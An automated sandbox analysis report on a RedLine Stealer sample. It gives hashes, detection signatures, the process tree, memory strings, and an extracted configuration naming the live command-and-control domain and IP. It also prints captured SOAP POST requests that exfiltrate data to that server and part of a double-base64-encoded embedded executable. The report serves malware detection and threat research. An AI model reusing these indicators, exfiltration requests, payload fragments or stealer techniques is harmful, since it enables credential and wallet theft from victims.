Loading ...

Play interactive tourEdit tour

Windows Analysis Report JEPayKhzWa

Overview

General Information

Sample Name:JEPayKhzWa (renamed file extension from none to exe)
Analysis ID:452458
MD5:f471bf615ef92f5ee73b48fe203373de
SHA1:11f0b6de8d4baf8e039f6244438ebb05bc589923
SHA256:d5608cba3115764a7758fa21c3e2f69724418dc48a8d0f5aaabe7efb71e2f28f
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains very large strings
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JEPayKhzWa.exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\JEPayKhzWa.exe' MD5: F471BF615EF92F5EE73B48FE203373DE)
    • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • JEPayKhzWa.exe (PID: 7152 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
    • JEPayKhzWa.exe (PID: 4680 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
      • 0x59ff8:$: VFZxUUFBT
      • 0x1275d0:$: VFZxUUFBT
      00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: JEPayKhzWa.exe PID: 4680JoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Process Memory Space: JEPayKhzWa.exe PID: 4680JoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.JEPayKhzWa.exe.44bdb88.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.JEPayKhzWa.exe.43f05b0.2.unpackSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
                • 0x16420:$: VFZxUUFBT
                0.2.JEPayKhzWa.exe.43f05b0.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  4.2.JEPayKhzWa.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 2 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: kurinogti.infoVirustotal: Detection: 8%Perma Link
                    Source: http://kurinogti.info:80/Virustotal: Detection: 8%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: JEPayKhzWa.exeVirustotal: Detection: 60%Perma Link
                    Source: JEPayKhzWa.exeReversingLabs: Detection: 62%
                    Source: JEPayKhzWa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: JEPayKhzWa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: kurinogti.infoContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: kurinogti.infoContent-Length: 1098077Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: kurinogti.infoContent-Length: 1098069Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 45.139.184.124 45.139.184.124
                    Source: Joe Sandbox ViewASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                    Source: unknownDNS traffic detected: queries for: kurinogti.info
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: kurinogti.infoContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info46kt
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info:80/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsP
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713802431.000000000333F000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/ewP
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: JEPayKhzWa.exeString found in binary or memory: https://api.ip.sb/geoip
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb46k
                    Source: JEPayKhzWa.exeString found in binary or memory: https://api.ipify.org
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: JEPayKhzWa.exe, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.713576583.000000000323C000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary:

                    barindex
                    .NET source code contains very large stringsShow sources
                    Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 0.0.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 0.2.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 3.2.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 3.0.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 4.2.JEPayKhzWa.exe.ef0000.1.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058519B8 NtUnmapViewOfSection,
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_05851A70 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058519B3 NtUnmapViewOfSection,
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_05851A68 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F72050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CB950
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CE260
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CE9EB
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_05850550
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058F9048
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FA7D8
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058F83D0
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FCB10
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FD278
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FBE70
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C2050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF2050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305D448
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305CB50
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDF3A0
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDD100
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDD0F1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD0040
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD2840
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD2831
                    Source: JEPayKhzWa.exe, 00000000.00000000.636379499.0000000000FCE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000003.00000000.642849049.000000000031E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.712365192.000000000041A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.712429776.0000000000F4E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exeBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.2.JEPayKhzWa.exe.43f05b0.2.unpack, type: UNPACKEDPEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: 0.2.JEPayKhzWa.exe.43f05b0.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: Process Memory Space: JEPayKhzWa.exe PID: 7024, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.csBase64 encoded string: 'VServiceModelChannelsWebSocketTransportDuplexSessionChannelcDisplayClass49144FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU9OQ2ZxQUFBQUFBQUFBQUFPQUFBZ0VMQVRBQUFIQUJBQUFNQUFBQUFBQUE4bjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLQjlBUUJQQUFBQUFLQUJBT1FFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQUNFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE4R3dCQUFBZ0FBQUFjQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU9RRUFBQUFvQUVBQUFnQUFBQjBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ